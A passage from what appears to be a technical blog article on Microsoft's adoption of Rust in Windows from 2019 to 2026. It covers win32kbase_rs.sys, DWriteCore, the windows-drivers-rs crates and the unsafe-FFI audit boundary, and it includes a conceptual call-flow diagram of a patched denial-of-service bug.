&lt;p&gt;&lt;strong&gt;Thread A -- the user-mode bindings.&lt;/strong&gt; In January 2020, Microsoft published &lt;code&gt;microsoft/windows-rs&lt;/code&gt; on GitHub, a set of idiomatic Rust bindings to the entire Win32, Windows Runtime, and Component Object Model surface generated on the fly from Windows-metadata projections. The README is exact: &quot;the windows and windows-sys crates let you call any Windows API past, present, and future using code generated on the fly directly from the metadata describing the API&quot; [@windows-rs-github]. The crate is strictly user-mode. The kernel bindings come later, in a different repository.The premise paragraph that originally framed this article conflated &lt;code&gt;windows-rs&lt;/code&gt; with the kernel bindings. They are different repositories: &lt;code&gt;microsoft/windows-rs&lt;/code&gt; is user-mode (Win32, WinRT, COM); &lt;code&gt;microsoft/windows-drivers-rs&lt;/code&gt; is the kernel and driver bindings. We will look at the latter in section 4.3.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Thread B -- the institutional commitment.&lt;/strong&gt; On 8 February 2021, Microsoft joined the Rust Foundation as a founding (Platinum) member, and announced it was forming an in-house Rust team to contribute compiler and tooling work [@msft-rust-foundation]. The same year, Microsoft began funding Ralf Jung&apos;s verification line at the Max Planck Institute for Software Systems -- the MIRI interpreter, the RustBelt proofs -- both of which give the formal teeth that distinguish &quot;Rust is safer&quot; from &quot;Rust is provably safe in a specific sense.&quot;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Thread C -- the academic foundation.&lt;/strong&gt; In April 2021, Jung, Jourdan, Krebbers, and Dreyer published &quot;Safe Systems Programming in Rust&quot; in &lt;em&gt;Communications of the ACM&lt;/em&gt; [@cacm-jung-2021]. The paper builds on their RustBelt result at POPL 2018, which constructed the first formal, machine-checked safety proof for a realistic subset of Rust [@rustbelt-popl-2018; @rustbelt-popl-page]. The RustBelt theorem has a property no informal language design has: it is &lt;em&gt;extensible&lt;/em&gt;. The project page states the result precisely: &quot;for each new Rust library that uses unsafe features, we can say what verification condition it must satisfy&quot; [@rustbelt-popl-page]. In plain language: safe Rust is type-sound by construction, and every &lt;code&gt;unsafe&lt;/code&gt; block can be discharged separately by a per-library proof obligation.&lt;/p&gt;
&lt;p&gt;That property -- a discharged proof obligation per &lt;code&gt;unsafe&lt;/code&gt; block -- is the engineering hook that makes Rust-in-kernel tractable. The kernel is full of &lt;code&gt;unsafe&lt;/code&gt;. There is no way around that fact; the kernel &lt;em&gt;is&lt;/em&gt; the trusted base, the layer that touches raw pointers and hardware. But if every &lt;code&gt;unsafe&lt;/code&gt; block has a local, statable proof obligation, then the engineering question shrinks from &quot;is the language safe?&quot; to &quot;is the audit of these specific blocks correct?&quot; That is a question reviewers can answer.&lt;/p&gt;

Singularity / Sing# and Verona are not the only Microsoft-adjacent safer-systems-language threads. The Cyclone project (AT&amp;amp;T / Cornell, mid-2000s) added region-based memory management to C; the Spec# / Code Contracts line (Microsoft Research, late 2000s) attached pre- and post-conditions to .NET methods. All three were technically attractive. None achieved industrial-scale adoption. The lesson Microsoft drew from those efforts -- visible in the windows-rs investment -- is that the surrounding toolchain and community trump language design. Rust came with crates.io and a working community; the Microsoft Research languages did not.
&lt;p&gt;By early 2023 the four ingredients were in place: a user-mode-scale Rust footprint at Microsoft, executive commitment via the Foundation, a verification story with RustBelt-grade formal teeth, and a working &lt;code&gt;windows-rs&lt;/code&gt; for the user-mode call sites. The pieces existed.&lt;/p&gt;
&lt;p&gt;What did it take to put Rust inside the kernel itself?&lt;/p&gt;
&lt;h2&gt;4. Three Generations of Microsoft&apos;s Rust-in-Windows Effort&lt;/h2&gt;
&lt;p&gt;The 2019-to-2026 story falls naturally into three generations. Each one solves the problem the previous one identified.&lt;/p&gt;

flowchart TD
  subgraph G1[&quot;Generation 1 -- 2019 to early 2023: Prerequisites&quot;]
    A1[&quot;Miller BlueHat IL 2019&lt;br /&gt;(70 percent figure)&quot;]
    A2[&quot;MSRC safer-systems essay&lt;br /&gt;(July 2019)&quot;]
    A3[&quot;windows-rs&lt;br /&gt;(January 2020)&quot;]
    A4[&quot;Rust Foundation founding&lt;br /&gt;(February 2021)&quot;]
    A5[&quot;Secure Future Initiative&lt;br /&gt;(November 2023)&quot;]
  end
  subgraph G2[&quot;Generation 2 -- March to July 2023: First ship&quot;]
    B1[&quot;Weston BlueHat IL 2023&lt;br /&gt;(March 29 to 30)&quot;]
    B2[&quot;DWriteCore in user-mode Rust&lt;br /&gt;(152K LOC)&quot;]
    B3[&quot;win32kbase_rs.sys in kernel Rust&lt;br /&gt;(36K LOC, behind flag)&quot;]
    B4[&quot;Insider Build 25905&lt;br /&gt;(July 12, 2023)&quot;]
  end
  subgraph G3[&quot;Generation 3 -- 2024 to 2026: Expansion and toolchain&quot;]
    C1[&quot;windows-drivers-rs public&lt;br /&gt;(2024)&quot;]
    C2[&quot;EMF parser in win32kbase_rs&lt;br /&gt;(by May 2025)&quot;]
    C3[&quot;Surface Rust drivers ship&lt;br /&gt;(July 2025)&quot;]
    C4[&quot;Russinovich RustConf 2025&lt;br /&gt;(September 2 to 5, Seattle)&quot;]
    C5[&quot;cargo-wdk on crates.io&lt;br /&gt;(November 2025)&quot;]
  end
  G1 --&amp;gt; G2
  G2 --&amp;gt; G3
&lt;h3&gt;4.1 Generation 1 (2019 to early 2023): the prerequisites&lt;/h3&gt;
&lt;p&gt;Generation 1 was &lt;em&gt;preparation&lt;/em&gt;. Four things had to land before Rust could ship in the kernel itself: Microsoft running Rust at user-mode scale internally; a working &lt;code&gt;no_std&lt;/code&gt; kernel target (the Rust compilation profile that strips the standard library&apos;s OS-services assumptions so a binary can run in kernel context); a verification story credible enough for executive sign-off; and that sign-off itself.&lt;/p&gt;
&lt;p&gt;The chronology is clean. January 2020: &lt;code&gt;windows-rs&lt;/code&gt; ships [@windows-rs-github]. February 2021: Microsoft joins the Rust Foundation as a founding member [@msft-rust-foundation]. 2019 through 2022: Project Verona and Singularity supply the academic foundations and the in-house safer-systems-language credibility [@verona-github; @singularity]. April 2021: the Jung et al. &lt;em&gt;Safe Systems Programming in Rust&lt;/em&gt; paper in &lt;em&gt;CACM&lt;/em&gt; gives the public-facing formal warrant [@cacm-jung-2021]. November 2, 2023: Brad Smith and Charlie Bell launch the Secure Future Initiative (SFI), a company-wide commitment that explicitly names memory-safety-language adoption as a software-engineering pillar [@sfi-onissues; @sfi-secblog]. The March 6, 2024 update on SFI confirms the engineering follow-through after the Storm-0558 and Midnight Blizzard incidents [@sfi-march24].&lt;/p&gt;
&lt;p&gt;The limitation of Generation 1 is in the name. &lt;em&gt;Prerequisites.&lt;/em&gt; No Rust had shipped &lt;em&gt;in&lt;/em&gt; the Windows kernel yet. DWriteCore was in user mode. windows-rs was in user mode. Verona was research. The next generation had to fire the actual gun.&lt;/p&gt;
&lt;h3&gt;4.2 Generation 2 (March to July 2023): the first ship&lt;/h3&gt;
&lt;p&gt;On 29 and 30 March 2023 in Tel Aviv, David &quot;dwizzle&quot; Weston, then Vice President of Enterprise and OS Security at Microsoft, took the BlueHat IL stage and announced two distinct Rust ports.BlueHat IL 2023 was held in Tel Aviv on 29 to 30 March 2023; the dominant English-language press coverage broke same-day on 27 April 2023 when an embargo lifted. The article uses 27 April 2023 throughout when the date in question is the public record rather than the talk itself. The Register&apos;s same-day write-up has the canonical quote set and used Weston&apos;s earlier &quot;Director&quot; title [@register-2023-04-27]. The article keeps the two ports strictly separate because conflating them is the most common error in the secondary coverage.&lt;/p&gt;
&lt;p&gt;The first port was &lt;em&gt;DWriteCore&lt;/em&gt;, the text-rendering and shaping engine that ships through the Windows App SDK. The Register&apos;s same-day coverage carried the line-of-code and performance numbers from Weston&apos;s deck -- we return to the exact counts in §6.2 -- but the load-bearing point at BlueHat IL 2023 was that DWriteCore is strictly user-mode code, not in the kernel [@register-2023-04-27].&lt;/p&gt;
&lt;p&gt;The second port was the one that the article you are reading is mostly about: &lt;strong&gt;&lt;code&gt;win32kbase_rs.sys&lt;/code&gt;&lt;/strong&gt;, a kernel binary containing the Win32k GDI region and shape engine -- about 36,000 lines of Rust, behind a feature flag, with at least one syscall in the Windows kernel implemented in Rust [@register-2023-04-27]. Weston&apos;s verbatim line is the moment that mattered.&lt;/p&gt;

There&apos;s actually a SysCall in the Windows kernel now that is implemented in Rust. -- David Weston, BlueHat IL 2023 [@register-2023-04-27].
&lt;p&gt;The first reader-verifiable artefact of that ship came on 12 July 2023. Windows 11 Canary-channel Insider Preview Build 25905 dropped, and the Windows Insider blog called out the change: &quot;Rust in the Windows Kernel ... win32kbase_rs.sys contains a new implementation of GDI region&quot; [@insider-25905]. From that moment forward, any reader with a recent Windows 11 Insider build could open Explorer at &lt;code&gt;C:\Windows\System32&lt;/code&gt;, sort by name, and find &lt;code&gt;win32kbase_rs.sys&lt;/code&gt; on disk. Generation 2 was a proof of existence. The binary was real. The syscall path it implemented was real. Some pieces ran behind a feature flag, but the cement had set.&lt;/p&gt;
&lt;p&gt;The limitation of Generation 2 was that the toolchain was Microsoft-internal. External driver authors could not reproduce the build pipeline; the &lt;code&gt;no_std&lt;/code&gt; kernel target had not been upstreamed to &lt;code&gt;rust-lang/rust&lt;/code&gt;; the allocator shim that adapted &lt;code&gt;GlobalAlloc&lt;/code&gt; onto &lt;code&gt;ExAllocatePool2&lt;/code&gt; lived in a private repository. Generation 3 had to address the third-party adoption question.&lt;/p&gt;
&lt;h3&gt;4.3 Generation 3 (2024 to mid-2026): expansion and toolchain rollout&lt;/h3&gt;
&lt;p&gt;Generation 3 has four threads running in parallel.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Thread 1: the public driver-development crate suite.&lt;/strong&gt; Microsoft published &lt;code&gt;microsoft/windows-drivers-rs&lt;/code&gt; -- the public repository of Rust crates for Windows driver development [@windows-drivers-rs; @heise-rust]. The repository contains six crates (&lt;code&gt;wdk&lt;/code&gt;, &lt;code&gt;wdk-sys&lt;/code&gt;, &lt;code&gt;wdk-alloc&lt;/code&gt;, &lt;code&gt;wdk-build&lt;/code&gt;, &lt;code&gt;wdk-panic&lt;/code&gt;, &lt;code&gt;wdk-macros&lt;/code&gt;) plus the &lt;code&gt;cargo-wdk&lt;/code&gt; Cargo subcommand that wraps &lt;code&gt;link.exe&lt;/code&gt;, &lt;code&gt;inf2cat&lt;/code&gt;, &lt;code&gt;signtool&lt;/code&gt;, and friends into a coherent Rust build. A companion sample repository &lt;code&gt;microsoft/Windows-rust-driver-samples&lt;/code&gt; provides Rust ports of the canonical Windows Driver Samples [@windows-rust-samples]. The README of &lt;code&gt;windows-drivers-rs&lt;/code&gt; is candid: the project is &quot;still in early stages of development and is not yet recommended for production use&quot; [@windows-drivers-rs]. It also pins LLVM 17 explicitly, because LLVM 18 introduced an ARM64 bindgen bug that breaks WDK header binding generation [@windows-drivers-rs].The &lt;code&gt;windows-drivers-rs&lt;/code&gt; README specifically pins LLVM 17 because LLVM 18 has a bug that causes bindings to fail to generate for ARM64. The fix is expected in LLVM 19. This is the kind of detail that distinguishes a developer-preview toolchain from a production one.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Thread 2: the 2025 in-kernel Rust expansion.&lt;/strong&gt; Between the 2023 ship and the May 2025 Check Point disclosure, the Rust footprint inside &lt;code&gt;win32kbase_rs.sys&lt;/code&gt; grew. The growth surface that became publicly known is the Enhanced Metafile Format (EMF / EMF+) parsing path -- the code that converts a path of Bezier curves into a clipping region [@checkpoint-dof; @cybersecuritynews]. The Check Point disclosure documents &lt;code&gt;region_from_path_mut()&lt;/code&gt; as Rust; the KB5058499 patch hardened the call site upstream of the Rust panic [@kb5058499; @esecurityplanet].The original article-focus paragraph speculated that the 2025 in-kernel expansion was the Win32k DirectDraw stack. No first-party Microsoft material identifies a DirectDraw Rust port. The publicly documented 2025 expansion is in the EMF / EMF+ metafile parser inside &lt;code&gt;win32kbase_rs.sys&lt;/code&gt;. We follow the public record.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Thread 3: the first in-box Rust drivers.&lt;/strong&gt; In July 2025, Microsoft&apos;s Surface team confirmed that several new Copilot+ Surface PCs ship with drivers written in Rust [@winbuzzer-surface; @thurrott-rust]. Microsoft&apos;s Melvin Wang wrote on the Windows Driver Development blog that &quot;the Surface team has contributed further to the open-source &lt;code&gt;windows-drivers-rs&lt;/code&gt; repository for driver development and shipped Surface drivers written in Rust&quot; [@thurrott-rust]. By September 2025, &lt;em&gt;The Register&lt;/em&gt; reported that no production third-party Rust driver had yet shipped through Windows Hardware Compatibility Program (WHCP) certification: CodeQL supports Rust in public preview at version 2.22.1, but only version 2.21.4 is &quot;validated for use with WHCP&quot; [@register-2025-09-04]. The certification path is being assembled in public.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Thread 4: the executive narrative.&lt;/strong&gt; On 2 to 5 September 2025, Mark Russinovich -- Azure CTO, Deputy CISO, and Technical Fellow -- delivered the RustConf 2025 keynote in Seattle, titled &quot;From Blue Screens to Orange Crabs: Microsoft&apos;s Rusty Revolution&quot; [@rustconf-2025-prog; @newstack-russinovich; @itpro-rust]. The keynote made three claims that matter for this article. First, Rust is &quot;mandated for new Azure components that handle untrusted input.&quot; Second, Microsoft is using Rust across &quot;kernel components, a cryptography library (&lt;code&gt;rustls-symcrypt&lt;/code&gt;), and ancillary components (&lt;code&gt;DirectWrite&lt;/code&gt;)&quot; plus Project Mu firmware, &lt;a href=&quot;https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/&quot; rel=&quot;noopener&quot;&gt;Caliptra&lt;/a&gt;, the Azure Integrated HSM, OpenVMM, and Hyperlight [@infoq-russinovich]. Third, the Check Point bug is success, not failure: a Rust panic that crashes the box is operationally better than a memory-corruption primitive that escalates privilege [@newstack-russinovich].The InfoQ piece that covers Russinovich&apos;s named-project list is dated May 2025 and is actually about his Rust Nation UK talk earlier that year, not RustConf 2025. The substantive content overlaps, but the venue is not the same. For RustConf 2025 itself, the primary references are the Rust Foundation program page and The New Stack&apos;s same-week summary [@rustconf-2025-prog; @newstack-russinovich].&lt;/p&gt;
&lt;p&gt;One more thread to acknowledge: on 24 December 2025, a LinkedIn post by Microsoft distinguished engineer Galen Hunt triggered a press cycle around an internal &quot;1 engineer, 1 month, 1 million lines of code&quot; research target [@register-2025-12-24]. The picture was corrected within days by Hunt&apos;s own clarification and Frank X. Shaw&apos;s denial that Microsoft has any plan to rewrite Windows 11 using AI [@infoworld-not-rewriting; @windowslatest-galen]. The §9 Aside walks the story in full.&lt;/p&gt;
&lt;p&gt;Three generations in, the toolchain is public, the binaries ship, the executive commitment is on the record, the certification path is being assembled, and the press has been corrected twice on the difference between research and roadmap. The pieces are in place. What is the &lt;em&gt;insight&lt;/em&gt; that makes Rust-in-kernel tractable as an engineering policy?&lt;/p&gt;
&lt;h2&gt;5. Memory-Safe by Default for New Code + the Unsafe-FFI Boundary&lt;/h2&gt;
&lt;p&gt;The structural insight that emerged from Generations 2 and 3 is one Russinovich named explicitly at RustConf 2025: Rust adoption inside an existing C / C++ kernel of roughly thirty million lines -- a widely-cited engineering estimate; Microsoft has not published an exact figure -- is a &lt;em&gt;policy decision&lt;/em&gt;, not a rewrite project [@newstack-russinovich]. The policy has two clauses. For &lt;em&gt;new&lt;/em&gt; code, default to Rust. For existing code, rewrite the high-blast-radius surfaces -- the GDI region engine, the EMF parser -- but not the rest. Russinovich&apos;s framing at the keynote: Rust is &quot;mandated for new Azure components that handle untrusted input&quot; [@infoq-russinovich].&lt;/p&gt;
&lt;p&gt;The new-code policy is empirically validated. The Android security team&apos;s September 2024 publication tracks the share of memory-safety vulnerabilities in Android over five years [@google-android-2024]. The headline curve looks like this.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Memory-safety share of vulnerabilities&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;2019&lt;/td&gt;
&lt;td&gt;~76%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;~24%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The drop did not come from rewriting existing C and C++. It came from writing &lt;em&gt;new&lt;/em&gt; code in Rust while letting the older code stop being modified. Vulnerabilities in any specific code module decay exponentially as that module stops changing, because (a) bugs that were going to be discovered get patched, and (b) new bugs are introduced primarily by new code [@google-android-2024]. Stop adding C, and the long-run share of memory-safety CVEs falls without anybody rewriting anything. That is the empirical anchor for the &quot;memory-safe by default for new code&quot; policy.&lt;/p&gt;
&lt;p&gt;The policy alone is not enough. The &lt;em&gt;mechanism&lt;/em&gt; that makes it executable is the unsafe-FFI boundary: a narrow, typed, auditable seam where safe Rust meets the C kernel it has to talk to.&lt;/p&gt;

A Rust crate attribute (`#![no_std]`) that opts out of linking the Rust standard library. The crate keeps `core` (and optionally `alloc`), and gets nothing else for free. Required for kernel binaries because the standard library assumes OS services -- file descriptors, threads, dynamic memory through libc -- that the kernel itself is in the business of providing.

The Rust standard-library trait that defines the global memory allocator. In kernel Rust, the trait is implemented by `wdk-alloc` to call `ExAllocatePool2` (allocate) and `ExFreePoolWithTag` (free) -- the NT pool allocator entry points that drivers have used since the late 1990s.

The mechanism a programming language uses to call functions written in another language across an Application Binary Interface (ABI). In kernel Rust, FFI to C kernel headers is generated mechanically by `bindgen` from WDK headers; every call site that crosses the boundary is wrapped in `unsafe`.

A region of Rust code where the compiler relaxes its safety invariants and the programmer accepts responsibility for upholding them. Inside `unsafe`, raw pointers may be dereferenced, mutable static state may be touched, and FFI calls may be made. The safety guarantee of any Rust system is exactly as strong as the human audit of these blocks.
&lt;p&gt;Every Rust kernel module has three &lt;code&gt;unsafe&lt;/code&gt; layers, and the audit of those three layers &lt;em&gt;is&lt;/em&gt; the safety story.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Layer 1: the allocator shim.&lt;/strong&gt; The kernel has no malloc. It has &lt;code&gt;ExAllocatePool2&lt;/code&gt;, which takes a pool type, a size, and a four-character tag, and returns memory from one of the NT pool managers. Rust&apos;s &lt;code&gt;Box&amp;lt;T&amp;gt;&lt;/code&gt;, &lt;code&gt;Vec&amp;lt;T&amp;gt;&lt;/code&gt;, &lt;code&gt;String&lt;/code&gt;, and &lt;code&gt;Arc&amp;lt;T&amp;gt;&lt;/code&gt; all expect a &lt;code&gt;GlobalAlloc&lt;/code&gt; implementation underneath. &lt;code&gt;wdk-alloc&lt;/code&gt; is the bridge: it implements &lt;code&gt;GlobalAlloc&lt;/code&gt; over &lt;code&gt;ExAllocatePool2&lt;/code&gt; / &lt;code&gt;ExFreePoolWithTag&lt;/code&gt;, with &lt;code&gt;unsafe&lt;/code&gt; blocks at every FFI call [@windows-drivers-rs]. If the allocator shim is wrong -- if it forgets to zero memory, mismatches a tag, or returns a misaligned pointer -- every safe Rust collection above it is suddenly &lt;em&gt;not&lt;/em&gt; safe.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Layer 2: the FFI surface.&lt;/strong&gt; Bindgen generates &lt;code&gt;extern &quot;system&quot;&lt;/code&gt; declarations from the WDK headers, turning each C function signature into a Rust prototype with &lt;code&gt;unsafe&lt;/code&gt; semantics [@windows-drivers-rs]. Every cross-language call is an &lt;code&gt;unsafe&lt;/code&gt; block in the Rust caller. The audit obligation here is: did bindgen translate the C signature faithfully? Is the calling convention right? Are pointer ownership and lifetime invariants in the C function&apos;s documentation actually upheld in the Rust caller? Bindgen is mechanical; the audit is not.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Layer 3: the pointer-arithmetic wrappers.&lt;/strong&gt; Where Rust must observe raw C structs -- &lt;code&gt;IRP&lt;/code&gt;, &lt;code&gt;KAPC&lt;/code&gt;, &lt;code&gt;FAST_IO_DISPATCH&lt;/code&gt;, and the various &lt;code&gt;Win32k&lt;/code&gt;-internal layouts -- the boundary code wraps each struct in a typed Rust newtype that asserts the invariants the C code expects, before any non-&lt;code&gt;unsafe&lt;/code&gt; Rust code touches it. A common pattern is the &lt;code&gt;RegionImpl&amp;lt;&apos;a&amp;gt;&lt;/code&gt; family of wrappers: a Rust struct that holds a raw pointer plus a lifetime parameter, with all public methods written in safe Rust and a small number of private &lt;code&gt;unsafe&lt;/code&gt; methods that do the actual dereferencing.&lt;/p&gt;

flowchart TD
  subgraph Safe[&quot;Safe Rust&quot;]
    SR[&quot;Rust kernel module&lt;br /&gt;(safe code, ~90% of LOC)&quot;]
  end
  subgraph Unsafe[&quot;Three unsafe layers&quot;]
    U1[&quot;Allocator shim&lt;br /&gt;wdk-alloc on ExAllocatePool2&quot;]
    U2[&quot;FFI surface&lt;br /&gt;bindgen extern system decls&quot;]
    U3[&quot;Pointer-arithmetic wrappers&lt;br /&gt;IRP, KAPC, FAST_IO_DISPATCH&quot;]
  end
  subgraph C[&quot;C kernel&quot;]
    NT[&quot;ntoskrnl, win32k, hal&quot;]
  end
  SR --&amp;gt; U1
  SR --&amp;gt; U2
  SR --&amp;gt; U3
  U1 --&amp;gt; NT
  U2 --&amp;gt; NT
  U3 --&amp;gt; NT
&lt;p&gt;The picture is small. A typical Rust kernel module has a few hundred FFI call sites, all typed, all auditable, with the conventional Rust community discipline that every &lt;code&gt;unsafe&lt;/code&gt; block carries a &lt;code&gt;SAFETY:&lt;/code&gt; comment justifying the invariants the human author claims to uphold.The Rust community convention is that every &lt;code&gt;unsafe&lt;/code&gt; block carries a &lt;code&gt;SAFETY:&lt;/code&gt; comment justifying the invariants the human author guarantees. Microsoft&apos;s internal review guidance reinforces this for kernel code, and the &lt;code&gt;windows-drivers-rs&lt;/code&gt; samples follow the pattern consistently. The safety guarantee of the whole module is exactly as strong as the audit of those few hundred sites. Not magic. Not a free lunch. A finite, reviewable boundary.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;windows-drivers-rs&lt;/code&gt; README acknowledges this without euphemism. Microsoft&apos;s Nate Deisinger captured the position in the November 2025 Windows Driver Development blog post:&lt;/p&gt;

Drivers using these crates still need to make use of unsafe blocks for interacting with the Windows operating system, removing some of the benefits of Rust. -- Nate Deisinger, *Towards Rust in Windows Drivers* [@techcommunity-rust-drivers].
&lt;p&gt;That is the load-bearing acknowledgement. Rust does not magically make the C kernel disappear. It pushes the audit frontier &lt;em&gt;to a narrow, typed, fuzz-able boundary&lt;/em&gt;. The wins compound there: type checking catches whole bug families before they ever reach review, fuzzing concentrates on a few hundred sites rather than a million, and the rest of the Rust code -- the other 90% -- gets the full benefit of the safety guarantee with no per-call-site audit burden.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Rust in the Windows kernel is not magic. It is a finite, typed, fuzzable, reviewable boundary between safe Rust and &lt;code&gt;unsafe&lt;/code&gt; C interop. The safety guarantee of any module is exactly as strong as the audit of that boundary -- which is exactly what makes it engineering policy rather than a wishful slogan.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That is the strategy in the abstract. What does it actually look like on disk in Windows 11 24H2 in May 2026?&lt;/p&gt;
&lt;h2&gt;6. What Actually Ships in Windows 11 24H2 in 2026&lt;/h2&gt;
&lt;p&gt;This section is an inventory of artefacts you can verify yourself: files on disk, GitHub repositories, KB articles, conference keynotes. Six subsections, each with receipts.&lt;/p&gt;
&lt;h3&gt;6.1 &lt;code&gt;win32kbase_rs.sys&lt;/code&gt; -- the in-kernel GDI region and shape engine&lt;/h3&gt;
&lt;p&gt;File location: &lt;code&gt;%SystemRoot%\System32\win32kbase_rs.sys&lt;/code&gt;. Reader-verifiable on any Windows 11 24H2 install. This is the binary the article opened on.&lt;/p&gt;
&lt;p&gt;Original scope at the April 2023 announcement: the Win32k GDI region and shape engine, about 36,000 lines of Rust, behind a feature flag, with at least one syscall in the Windows kernel implemented in Rust [@register-2023-04-27]. By July 2023 the binary was visible in Canary Insider Preview Build 25905 with the GDI region implementation called out by name in the Windows Insider blog [@insider-25905].&lt;/p&gt;
&lt;p&gt;The 2025 expansion surface is the Enhanced Metafile Format / EMF+ metafile-parsing path. The Check Point Research disclosure -- whose call flow §1 walks through in prose and the diagram below replays -- documents the bug; KB5058499, dated 28 May 2025, hardens the bounds check upstream and ships as a preview update for OS Build 26100.4202 [@checkpoint-dof; @kb5058499].&lt;/p&gt;

sequenceDiagram
  participant App as Untrusted process
  participant K as Win32k C dispatcher
  participant R as win32kbase_rs.sys (Rust)
  participant Panic as core::panicking
  App-&amp;gt;&amp;gt;K: NtGdiSelectClipPath (malformed EMF+ metafile)
  K-&amp;gt;&amp;gt;R: parse EmfPlusDrawBeziers record
  R-&amp;gt;&amp;gt;R: build path with mismatched point count
  R-&amp;gt;&amp;gt;R: region_from_path_mut() indexes out of bounds
  R-&amp;gt;&amp;gt;Panic: panic_bounds_check (safe Rust detects OOB)
  Panic-&amp;gt;&amp;gt;Panic: panic = abort (no unwinder in no_std)
  Panic--&amp;gt;&amp;gt;K: bugcheck SYSTEM_SERVICE_EXCEPTION
  K--&amp;gt;&amp;gt;App: machine bluescreens (DoS, not RCE)
  Note over R,K: Microsoft fixed in KB5058499 on May 28, 2025
&lt;p&gt;The article does not claim a 2026 line-of-code figure for &lt;code&gt;win32kbase_rs.sys&lt;/code&gt;. The most recent first-party number is the April 2023 ~36,000 figure quoted to The Register; no first-party Microsoft source has published a refresh. Open Problem P1 in section 9 keeps that an honest open question.Earlier drafts of articles like this one have asserted &quot;over 100,000 lines of in-kernel Rust by 2026.&quot; That number is not in the primary record. The empirical claim we can make is that the binary exists, the GDI region engine is in Rust, the EMF parser is partly in Rust, and the binary is observably larger and more functional in 2026 than the 2023 ship -- but the actual line count is unpublished.&lt;/p&gt;
&lt;h3&gt;6.2 DWriteCore -- user-mode Rust in the Windows App SDK&lt;/h3&gt;
&lt;p&gt;DWriteCore is the standalone, distributable text-rendering and OpenType-shaping engine that ships through the Windows App SDK. At the April 2023 BlueHat IL announcement Weston quoted about 152,000 lines of Rust plus about 96,000 lines of C++, with a 5 to 15% performance improvement on selected OpenType shaping paths [@register-2023-04-27]. Russinovich at RustConf 2025 framed the team size and timeline: &quot;Two Microsoft developers did it in six months -- 154,000 lines of code&quot; [@newstack-russinovich]. DWriteCore is &lt;em&gt;strictly user mode&lt;/em&gt;. The distribution channel is Windows App SDK 1.2 and above, not Windows 11 22H2/23H2 system updates. It is the user-mode counterpart to the kernel-mode &lt;code&gt;win32kbase_rs.sys&lt;/code&gt;, not the same thing.&lt;/p&gt;
&lt;h3&gt;6.3 The &lt;code&gt;windows-drivers-rs&lt;/code&gt; crate suite&lt;/h3&gt;
&lt;p&gt;The driver-development face of Microsoft&apos;s Rust effort is &lt;code&gt;microsoft/windows-drivers-rs&lt;/code&gt; [@windows-drivers-rs]. The repository contains six crates:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;wdk&lt;/code&gt; -- safe wrappers over the Windows Driver Kit&lt;/li&gt;
&lt;li&gt;&lt;code&gt;wdk-sys&lt;/code&gt; -- bindgen-generated raw FFI bindings&lt;/li&gt;
&lt;li&gt;&lt;code&gt;wdk-alloc&lt;/code&gt; -- the &lt;code&gt;GlobalAlloc&lt;/code&gt; shim onto &lt;code&gt;ExAllocatePool2&lt;/code&gt; / &lt;code&gt;ExFreePoolWithTag&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;wdk-build&lt;/code&gt; -- build script infrastructure for &lt;code&gt;Cargo.toml&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;wdk-panic&lt;/code&gt; -- the &lt;code&gt;panic_handler&lt;/code&gt; implementation with &lt;code&gt;panic = &quot;abort&quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;wdk-macros&lt;/code&gt; -- procedural macros (driver entry-point, IOCTL routing, etc.)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The &lt;code&gt;cargo-wdk&lt;/code&gt; subcommand wraps &lt;code&gt;link.exe&lt;/code&gt;, &lt;code&gt;inf2cat&lt;/code&gt;, and &lt;code&gt;signtool&lt;/code&gt; so &lt;code&gt;cargo build&lt;/code&gt; does the right thing in a developer-mode signed driver workflow. November 2025: &lt;code&gt;cargo-wdk&lt;/code&gt; became publishable on crates.io [@techcommunity-rust-drivers]. The companion samples repository &lt;code&gt;microsoft/Windows-rust-driver-samples&lt;/code&gt; provides Rust ports of the canonical Windows Driver Samples for KMDF and UMDF [@windows-rust-samples].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The &lt;code&gt;windows-drivers-rs&lt;/code&gt; README is explicit: &quot;still in early stages of development and is not yet recommended for production use&quot; [@windows-drivers-rs]. Treat the crate suite as a developer-preview toolchain. KMDF 1.33-era bindings are on crates.io; WDM and UMDF are possible with &lt;code&gt;wdk-build&lt;/code&gt; modification. LLVM 17 is pinned because LLVM 18 has an ARM64 bindgen bug.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;6.4 OpenVMM, OpenHCL, and Hyperlight -- the virtualization-side Rust&lt;/h3&gt;
